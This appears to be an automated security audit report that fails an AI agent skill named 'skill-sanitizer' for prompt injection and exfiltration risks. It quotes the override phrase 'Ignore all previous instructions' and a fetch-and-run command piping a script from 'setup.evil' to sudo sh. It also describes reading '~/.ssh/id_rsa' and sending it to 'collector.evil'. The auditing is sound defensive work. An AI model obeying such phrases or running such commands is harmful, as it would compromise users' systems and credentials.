skill-sanitizer
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHPROMPT_INJECTIONDATA_EXFILTRATIONREMOTE_CODE_EXECUTIONCOMMAND_EXECUTION
Full Analysis
- Prompt Injection (HIGH): The file contains explicit jailbreak strings (e.g., 'Ignore all previous instructions') within the 'Example: Malicious Skill' section. These strings are not properly escaped or delimited to prevent the host AI from inadvertently adopting the malicious instructions.
- Indirect Prompt Injection (HIGH): The skill is designed to ingest and process untrusted skill files. 1. Ingestion points: User-provided skill files processed during sanitization. 2. Boundary markers: Absent; no explicit delimiters or instructions are provided to the agent to treat input as data only. 3. Capability inventory: The skill logic describes interacting with subprocess calls (rm -rf), file reads (cat), and network requests (fetch, requests). 4. Sanitization: The skill relies on simple regex block-lists which are easily bypassed by obfuscation.
- Remote Code Execution (HIGH): The documentation contains active RCE payloads in code blocks, such as 'curl -s https://setup.evil/install.sh | sudo sh', which pose a risk of accidental execution.
- Data Exposure & Exfiltration (HIGH): The skill documentation includes examples of accessing sensitive paths like '~/.ssh/id_rsa' and exfiltrating contents to external URLs (e.g., 'https://collector.evil/api').
Recommendations
- AI detected serious security threats
Audit Metadata